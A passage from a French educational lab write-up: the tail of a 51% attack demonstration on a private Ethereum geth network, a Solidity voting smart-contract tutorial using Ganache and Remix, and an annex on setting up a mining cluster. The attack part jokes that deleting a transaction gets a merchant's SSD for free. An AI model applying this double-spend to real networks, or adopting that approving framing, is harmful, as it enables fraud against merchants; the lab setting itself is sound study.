INFO [03-08|13:45:54.269] Imported new chain segment               blocks=625 txs=0 mgas=0.000 elapsed=243.145ms mgasps=0.000 number=638 hash=fe2c57…9bc3ef dirty=60.99KiB
INFO [03-08|13:45:55.471] Imported new chain segment               blocks=19  txs=0 mgas=0.000 elapsed=105.940ms mgasps=0.000 number=657 hash=a731ef…c90bff dirty=60.99KiB
INFO [03-08|13:45:55.473] 😱 block lost                             number=485 hash=9d4fde…106d6c
INFO [03-08|13:45:55.473] 😱 block lost                             number=487 hash=5a451f…47f46b
INFO [03-08|13:45:55.473] 😱 block lost                             number=488 hash=d1ca36…84ca96
INFO [03-08|13:45:55.474] 😱 block lost                             number=490 hash=275b8a…e0cc41
INFO [03-08|13:45:55.474] 😱 block lost                             number=491 hash=f118f2…66313c
INFO [03-08|13:45:55.474] Commit new mining work                   number=658 sealhash=90f6ff…86f93c uncles=0 txs=0 gas=0     fees=0       elapsed=1.098ms
INFO [03-08|13:45:56.228] Imported new chain segment               blocks=1   txs=0 mgas=0.000 elapsed=5.389ms   mgasps=0.000 number=658 hash=479cff…54e507 dirty=60.99KiB
INFO [03-08|13:45:56.229] Commit new mining work                   number=659 sealhash=a7f83e…0b8aa1 uncles=0 txs=0 gas=0     fees=0       elapsed=164.506µs
INFO [03-08|13:45:57.470] Successfully sealed new block            number=659 sealhash=a7f83e…0b8aa1 hash=615a0f…2e81e7 elapsed=1.241s
INFO [03-08|13:45:57.471] 🔨 mined potential block                  number=659 hash=615a0f…2e81e7
INFO [03-08|13:45:57.471] Commit new mining work                   number=660 sealhash=ceb40b…f1b31d uncles=0 txs=0 gas=0     fees=0       elapsed=349.797µs
```

Comme notre transaction était sur le block 466, il est normalement supprimé, vérifiez à nouveau la transaction à partir de la console de maliciousPerson :

{- Sur l'hôte maliciousMiner -}

`geth --ipcpath geth.ipc --datadir maliciousPerson/data attach`
```shell
Welcome to the Geth JavaScript console!

instance: Geth/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
coinbase: 0x11f7d3ee650bac6f676d4fc51dbbe153d590bc8a
at block: 429 (Sun Mar 08 2020 13:43:07 GMT+0100 (CET))
 datadir: /root/blockchain_51/maliciousPerson/data
 modules: admin:1.0 debug:1.0 eth:1.0 ethash:1.0 miner:1.0 net:1.0 personal:1.0 rpc:1.0 txpool:1.0 web3:1.0

> web3.eth.getTransactionReceipt("0x2db31525f37ecfb38ef934c125ae9534a4889325142caa336b9acf8b112a5696")
null
```

- N'existe plus ! !!
- Bravo ! !! :D

Vous pouvez voir ici que vous avez acheté par exemple un SSD à un site marchand et que vous pouvez supprimer la transaction. Vous l'avez donc gratuitement :D

## Les smart contract

### Définition

<div style="text-align: justify">

Un "contrat intelligent" est un accord entre plusieurs parties sous forme de code informatique. Ils sont distribués et de ce fait, stockés dans une base de données publique et ne peuvent pas être modifiés (dans notre cas une blockchain). Ils permettent d’effectuer des transactions de manière automatique sans avoir recours à une tierce partie, ne dépendant ainsi de personne. Les transactions automatisées se produisent lorsqu’une ou plusieurs conditions du contrat sont remplies.

</div>

### Exemple de smart contract

<div style="text-align: justify">

**Assurances** :
En septembre 2017, une filiale du groupe d’assurance AXA nommée Fizzy a lancé un service d’assurance 100% automatisé grâce à des smart contracts. Ce service indemnise automatiquement les passagers d’un vol ayant subi un retard supérieur à 2 heures.

**Santé** :
Dans ce domaine nous pouvons citer Kidner Project, un projet auquel a participé la Française Sajida Zouarhi souhaitant décentraliser et augmenter la traçabilité de la gestion des transplantations d’organes.

**Entreprises** :
Les smart contracts peuvent être utilisés dans le cadre de la gestion d’une entreprise. Par exemple, l’ensemble des versements des salaires peuvent être automatisés de manière simple et fiable.

</div>

### Le langage utilisé : Solidity

<div style="text-align: justify">

Solidity est un langage de programmation orienté objet qui présente des similitudes avec JavaScript ou C++. C'est un langage de haut niveau, qui sera compilé en langage de bas niveau (bytecode) pour être interprété par l'environnement d'exécution d'Ethereum.
Il s'agit de la Machine Virtuelle d’Ethereum ou EVM : cet environnement d’exécution est isolé du réseau et permet d’interpréter le code Solidity une fois compilé, afin de garantir la mise à jour de l’état des contrats (et donc de la blockchain), via tous les nœuds validateurs du réseau. Ce sont les mineurs qui exécutent ces instructions et mettent à jour la blockchain d’Ethereum : ils sont récompensés financièrement pour cela. Chaque instruction d'un contrat Solidity aura donc un coût d’exécution (en GAS). Afin d’éviter les boucles infinies au sein d’un programme, il y a toujours une limite au GAS qui pourra être consommé.

**GAS** :
Chaque fois que vous désirez faire fonctionner un smart contract sur le réseau Ethereum, il faudra utiliser de la puissance de calcul. Le gas représente le temps de travail informatique nécessaire pour mener à bien une telle opération. Il s'agit d'une valeur prédéfinie, sur laquelle l'ensemble du réseau s'est mis d'accord. En utilisant un certains montant de gas et un prix associé par unité de gas, on aura le coût nécessaire, libellé en ETH, pour effectuer ce type de transaction.
</div>

### Les composants de Solidity

<div style="text-align: justify">

Avec Solidity, un contrat est défini par différents éléments :
* **Les variables d’état** : elles peuvent être de différent types et leur valeur est stockée en permanence dans le contrat.
* **Les fonctions** : au cœur du code du contrat, elles seront exécutées selon les arguments et les paramètres injectés, et renverront les variables souhaitées. Elles peuvent être appelées de façon interne ou externe et on peut définir leur degré de visibilité.
* **Les modificateurs** : ces outils permettent d’amender les fonctions d’un contrat de façon déclarative, ce qui est pratique pour éviter les répétitions dans le code et gagner en lisibilité.
* **Les événements** : ils permettent d'interagir avec le système de journalisation des actions réalisées par le contrat (les "logs" générés par l'EVM).
* **Les types** permettent de définir ce que représente une variable. Avec Solidity, on peut créer des structs (des types “personnalisés” pouvant regrouper plusieurs variables) et faire du mapping (indexer des variables selon un système clé -> valeur). Il y a des différences notables avec d’autres langages orientés objets, notamment dans le cadre du mapping.

</div>

### Exemple : une élection grâce à un smart contract ?

<div style="text-align: justify">

Afin de donner un exemple d'application, nous allons créer un système de vote, basé sur un smart contract et intégré dans une blockchain privée, afin d’élire votre bureau étudiant préféré. Le but est de mettre en application un smart contract proposant un système de vote par bulletin, le propriétaire du contrat sera chargé de donner l’autorisation de vote aux différents électeurs. 
Pour ce faire nous avons besoin de plusieurs éléments afin de créer notre smart contract :

- Un contrat écrit dans le langage Solidity

- Une blockchain ethereum privée

- Un moyen de tester ce dit contrat

Dans cet exemple il ne s'agira pas d'écrire le smart contract mais de comprendre le déroulement de l'exécution d'un smart contract au sein d'une blockchain ethereum. De ce fait un contrat réalisé en amont est mis à disposition :

```
pragma solidity >=0.4.22 <0.7.0;

contract BSI {
    
    struct Bureau {
        string name;
        uint voteCount;
    }
    
    struct Electeur {
        bool voted;
        uint voteIndex;
        uint weight;
    }
    
    address public owner;
    string public name;
    mapping(address => Electeur) public electeurs;
    Bureau[] public bureaux;
    uint public auctionEnd;
    
    event ElectionResult(string name, uint voteCount);
    
    function Election(string memory _name, uint durationMinutes, string memory bureau1, string memory bureau2) public{
        owner = msg.sender;
        name =  _name;
        auctionEnd = now + (durationMinutes * 1 minutes);
        
        bureaux.push(Bureau(bureau1, 0));
        bureaux.push(Bureau(bureau2, 0));
    }
    
    function authorize(address electeur) public{
        require(msg.sender == owner);
        require(!electeurs[electeur].voted);
        
        electeurs[electeur].weight = 1;
    }
    
    function vote(uint voteIndex) public{
        require(now < auctionEnd);
        require(!electeurs[msg.sender].voted);
        
        electeurs[msg.sender].voted = true;
        electeurs[msg.sender].voteIndex = voteIndex;
        
        bureaux[voteIndex].voteCount += electeurs[msg.sender].weight;
    }
    
    function winningProposal() public view
            returns (uint winningProposal_)
    {
        uint winningVoteCount = 0;
        for (uint p = 0; p < bureaux.length; p++) {
            if (bureaux[p].voteCount > winningVoteCount) {
                winningVoteCount = bureaux[p].voteCount;
                winningProposal_ = p;
            }
        }
    }

    function winnerName() public view
            returns (string memory winnerName_)
    {
        winnerName_ = bureaux[winningProposal()].name;
    }
    
    function end() public{
        require(msg.sender == owner);
        require(now >= auctionEnd);
        
        for(uint i=0; i < bureaux.length; i++){
           emit ElectionResult(bureaux[i].name, bureaux[i].voteCount);
        }
    }
}

```

Ce contrat est développé avec le langage Solidity, qui est un langage de haut niveau, orienté objet, spécialement conçu afin de permettre l'écriture de smart contract. Il est souvent défini comme similaire au Javascript. Pour le réaliser nous nous sommes inspirés du smart contract d’exemple « Ballot » fournit par Solidity que nous avons simplifié.
 
Aussi afin de mettre en place rapidement une blockchain privée nous allons utiliser "Ganache". Ganache permet en effet de déployer une blockchain hébergée en local d'un simple clic. L'outil est open source et est disponible pour Windows, Mac et Linux.

Lien Ganache : https://www.trufflesuite.com/ganache

Enfin dans le but de pouvoir tester l'exécution du smart contract nous allons utiliser "Remix". Remix est un IDE accessible par un simple navigateur.
L'intérêt ici de Remix et qu'il permet de compiler et d'exécuter des smart contracts directement sur notre blockchain privée déployer par Ganache.

Lien Remix : https://remix.ethereum.org/

</div>

### La pratique

Il faut dans un premier temps installer et configurer ganache.

<table align="center"><tr><td align="center" width="9999">
  <img width="690" height="490" src="img/SC-ganache.PNG">
</td></tr></table>

<div style="text-align: justify">

Ici nous avons créé un Workspace que nous avons nommé "BSI" avec la génération de 5 comptes. Les autres paramètres ont été laissés par défaut. On peut remarquer, entre autres, l’adresse de nos cinq comptes ainsi que le nombre d’ethers attribués à chacun.

Une fois notre blockchain privée fonctionnel, nous allons nous rendre sur Remix. Il faut sélectionner l'environnement Solidity. Les deux espaces que nous allons principalement utiliser sont l’espace de compilation et l’espace de déploiement.
Maintenant il faut créer un nouveau fichier à l’intérieur duquel nous allons coller le contenu du contrat mis à disposition. 

</div>

<table align="center"><tr><td align="center" width="9999">
  <img width="690" height="390" src="img/SC-contrat.PNG">
</td></tr></table>

<div style="text-align: justify">

Il ne reste plus qu’à le compiler via l’espace « Solidity compiler ». Aucune erreur ne devrait apparaitre cependant s’il y en a, il est possible que ce soit dû à l’utilisation d’une version trop récente du compilateur. En effet Remix utilise par défaut la version la plus récente du compilateur, essayez avec une version antérieure pour éviter ce problème.

</div>

<table align="center"><tr><td align="center" width="9999">
  <img width="690" height="390" src="img/SC-contrat-compile.PNG">
</td></tr></table>

<div style="text-align: justify">

Il faut se rendre maintenant dans l’espace de déploiement « Deploy & run transactions ». Afin de pouvoir se connecter à notre environnement local sélectionnez l’option « Web3 Provider » et renseignez votre adresse IP localhost (127.0.0.1) et le numéro de port associé à votre blockchain. Le numéro de port est visible dans Ganache dans la barre d’information de votre Workspace.

On peut alors constater que les adresses des comptes de notre blockchain Ganache et les ethers associés sont maintenant visibles dans Remix. 

</div>

<table align="center"><tr><td align="center" width="9999">
  <img width="1190" height="390" src="img/SC-join-remix-final.png">
</td></tr></table>


### Déploiement du smart contract


<div style="text-align: justify">

La partie initialisation est terminée. Nous allons voir maintenant comment déployer notre smart contract. Pour ce faire, rien de plus simple, du cliquer sur « Deploy ». Le smart contract est alors ajouté sous le menu « Deployed contract ».

</div>

<table align="center"><tr><td align="center" width="9999">
  <img width="390" height="490" src="img/SC-contract-functions.PNG ">
</td></tr></table

<div style="text-align: justify">

Dans la capture d’écran ci-dessus il y a plusieurs éléments importants à prendre en compte. Le premier est que la différence de couleur des boutons d’actions du smart contract est due à l’impact de l’action sur notre blockchain. En effet la couleur orange signifie que l’action entrainera la modification d’un block et donc de la blockchain alors que le couleur bleue signifie que l’action se veut être simplement un appel de données qui n’entrainera aucune modification.

Les boutons d’actions présents font appel aux différentes fonctions du même nom de notre smart contract. De ce principe :

- Le bouton « authorize » permet d’inscrire un électeur grâce à son adresse de compte. Seul le propriétaire du contrat peut inscrire un électeur. 
- Le bouton « Election » permet de renseigner les différents paramètres de l’élection
- Le bouton « end » permet de clôturer l’élection et d’afficher les résultats.
- Le bouton « vote » permet aux électeurs de voter.
- Les autres boutons d’actions font eux aussi appel à des variables du smart contract et permettent de récupérer certaines informations de celui-ci. Nous ne les détaillerons pas car ils n’impliquent pas de modification de la blockchain.

</div>

### Initialisation du smart contract

<div style="text-align: justify">

La première étape afin d’initialiser le smart contract est de renseigner les informations de l’élection avec le compte propriétaire. Dans notre cas il faut définir le nom de l’élection, sa durée (en min) et les candidats. Ce qui donne ici : « Quel est votre bureau préféré ? », 10, « BSI », « BDE ». On obtient le résultat suivant :

</div>

<table align="center"><tr><td align="center" width="9999">
  <img width="690" height="490" src="img/SC-create-election.PNG">
</td></tr></table>

<div style="text-align: justify">

On constate au niveau des logs que l’action a bien été effectuée et que l’input correspond bien aux informations que nous avons renseignées. On peut aussi remarquer que cette action a utilisé du « gaz », en effet chaque action sur un smart contract est aussi considérée comme une transaction. De ce fait comme le veut le principe de fonctionnement de la blockchain Ethereum, chaque transaction possède un certain cout.

Procédons maintenant à l’inscription des électeurs. A partir du compte propriétaire, renseignez séparément chacune des adresses de compte des électeurs dans le champ du bouton d’actions « authorize ». Vous devriez obtenir le résultat suivant :

</div>

<table align="center"><tr><td align="center" width="9999">
  <img width="690" height="490" src="img/SC-authorize.PNG">
</td></tr></table>

<div style="text-align: justify">

On remarque ici aussi que l’action a bien été effectuée et que l’input correspond bien aux informations que nous avons renseignées.

</div>

### Phase d’élection

<div style="text-align: justify">

Passons maintenant au vote. Afin de réaliser un vote il suffit de sélectionner un compte électeur et de renseigner son vote et de cliquer sur « vote » :

</div>

<table align="center"><tr><td align="center" width="9999">
  <img width="690" height="490" src="img/SC-vote.PNG">
</td></tr></table>

### Résultat de l'élection

<div style="text-align: justify">

Une fois que tous les participants ont voté, ce contrat prévoit la possibilité d’afficher le gagnant de l’élection. Le bouton « WinnerName » permet cet affichage. Résultat de l’élection :

</div>

<table align="center"><tr><td align="center" width="9999">
  <img width="690" height="490" src="img/SC-win.PNG">
</td></tr></table>

<div style="text-align: justify">

Toutes les transactions sont aussi disponibles dans l’outil Ganache.

Cet exemple est maintenant terminé, nous présentons nos félicitations à l’équipe du BSI qui a remporté cette élection !

</div>

## Sources

- https://blog.octo.com/attaque-des-51-sur-une-blockchain-demonstration-sur-ethereum
- https://geth.ethereum.org/docs/interface/private-network
- https://cryptoast.fr/gas/
- https://solidity-fr.readthedocs.io/fr/latest/introduction-to-smart-contracts.html
- https://solidity-fr.readthedocs.io/fr/latest/solidity-by-example.html

## Annexes

### Blockchain Ethereum en cluster - Tests & Acculturation

#### L'infrastrucuture

Pour créer notre blockchain, nous avons utilisé :
* 3 noeuds qui serviront à miner sur notre blockchain
* 1 master qui ne minera pas, mais qui sera la "porte d'entrée" de notre blockchain

<table align="center"><tr><td align="center" width="9999">
  <img src="img/infra-blockchain.png">
</td></tr></table>


#### Création de la blockchain

**Sur le MasterNode**

Nous allons tout d'abord créer l'environnement :

```shell
mkdir /home/blockchain
cd /home/blockchain
```

Puis, nous créons le fichier genesis pour l'élaboration de la blockchain :

```shell
vi genesis.json
```

```shell
{
  "config": {
        "chainId": 4777,
        "homesteadBlock": 0,
        "eip150Block": 0,
        "eip155Block": 0,
        "eip158Block": 0
    },
  "alloc"      : {},
  "difficulty" : "0x400",
  "extraData"  : "",
  "gasLimit"   : "0x7A1200",
  "parentHash" : "0x0000000000000000000000000000000000000000000000000000000000000000",
  "timestamp"  : "0x00"
}
```

Nous initialisons notre blockchain via le fichier genesis, et en stockant toutes les données dans ./data :

```shell
geth --datadir=./data/ init genesis.json
```

<table align="center"><tr><td align="center" width="9999">
  <img width="800" src="img/blockchain1.png">
</td></tr></table>

Enfin, nous démarrons notre blockchain, et nous l'exposons pour que les noeuds de "minage" interviennent :

```shell
geth --datadir=./data/ --networkid 54124
```

<table align="center"><tr><td align="center" width="9999">
  <img width="800" src="img/blockchain2.png">
</td></tr></table>

*NB : A ce stade, nous avons notre blockchain initiliasé et démarré. Elle est en attente de "peers".*

Dnas un deuxième shell du master, entrez en mode console :

```shell
geth attach /home/blockchain/data/geth.ipc
```

Vous rentrez dans une console Javascript, laissez la fenêtre ouverte, nous en aurons besoin plus tard.

**Sur le premier noeud**

Maintenant, il faut rejoindre le noeud master à la blockchain et commencer à miner.
Pour cela, il faut recréer l'environnement :

```shell
mkdir /home/blockchain
cd /home/blockchain
```

Copier le fichier genesis du master sur le noeud *(commande a exécuté sur le master)* :

```shell
scp ./genesis.json root@10.0.0.126:/home/blockchain
```

Vous devez lancer l'initialisation de la blockchain et la démarrer dans le même réseau que le master :

```shell
geth --datadir=./data/ init genesis.json
geth --datadir=./data/ --networkid 54124
```

Vous devez créer un nouveau compte sur le noeud pour commencer à créer des intéractions (et ainsi commencer à miner par exemple). A partir d'un deuxième shell du noeud 1 :

```shell
geth attach /home/blockchain/data/geth.ipc
```

Puis, dans la console Javascript :
``` Javascript
personal.newAccount()
```

Enfin, vous devez ajouter le noeud à la blockchain du master, pour cela, vous devez récupérer l'enode et l'ajouter à la liste de peer autorisé sur le master :
``` Javascript
admin.nodeInfo.enode
```
```shell
"enode://89246c2c2e2452071730891fa069fa1149581ffff58add7c8659ddafd916cc42fe78c77c406295ab7276040865879976af4626d4ccf80aa49ae9537a4987497f@79.87.171.72:30303"
```
*NB : veuillez remplacer l'adresse IP public obtenue par votre ip local, pour ma part : 79.87.171.72 --> 10.0.0.126*

**Retour sur le Master, dans la console Javascript**

Pour autoriser le noeud à miner dans votre blockchain, il suffit donc de saisir la commande suivante :
``` Javascript
admin.addPeer("enode://89246c2c2e2452071730891fa069fa1149581ffff58add7c8659ddafd916cc42fe78c77c406295ab7276040865879976af4626d4ccf80aa49ae9537a4987497f@10.0.0.126:30303")
```

Vous pouvez vérifier l'ajout via la commande :
``` Javascript
admin.peers
```
<table align="center"><tr><td align="center" width="9999">
  <img width="800" src="img/blockchain6.png">
</td></tr></table>

**Retour sur le Noeud 1**

Pour commencer à miner, il faut définir le compte par défaut qui recevra les ether avec le plugin "miner" :
``` Javascript
miner.setEtherbase(web3.eth.accounts[0])
```

Nous pouvons vérifier le solde du compte, qui doit être à 0 car le minage n'a pas commencé :
``` Javascript
eth.getBalance(eth.coinbase)
```
<table align="center"><tr><td align="center" width="9999">
  <img src="img/blockchain7.png">
</td></tr></table>

Et, vous pouvez enfin commencer à miner :
``` Javascript
miner.start()
```
<table align="center"><tr><td align="center" width="9999">
  <img width="800" src="img/blockchain8.png">
</td></tr></table>

Nous pouvons vérifier quelques heures plus tard le nombre d'ether obtenu grâce au minage :
``` Javascript
eth.getBalance(eth.coinbase)
```
<table align="center"><tr><td align="center" width="9999">
  <img src="img/blockchain9.png">
</td></tr></table>

**Vous pouvez reproduire la même opération sur les deux autres noeud.**

#### Vérification

Afin de vérifier que les 3 noeuds minent sur la même blockchain, nous nous positionnons dans la console de retour de chaque noeud, et nous allons comparer les résultats.

**Sur le Master** :
Nous voyons qu'il importe des nouveaux blocs, nous pouvons relever l'importation du block 2991.

<table align="center"><tr><td align="center" width="9999">
  <img width="800" src="img/blockchain10-master.png">
</td></tr></table>

**Sur le noeud 1** :
Nous observons qu'il synchronise certain blocs, et qu'ils minent d'autres (CF blocs n°2992 par exemple).
<table align="center"><tr><td align="center" width="9999">
  <img width="800" height="435" src="img/blockchain11-noeud1.png">
</td></tr></table>


**Sur le noeud 2** :
De même, nous observons qu'il synchronise certain blocs (CF blocs n°2992 par exemple), et qu'ils minent d'autres (CF block n°2995 par exemple).

<table align="center"><tr><td align="center" width="9999">
  <img width="800" height="435" src="img/blockchain12-noeud2.png">
</td></tr></table>

**Sur le noeud 3** :
De même que les précédents.
<table align="center"><tr><td align="center" width="9999">
  <img width="800" height="435" src="img/blockchain13-noeud3.png">
</td></tr></table>
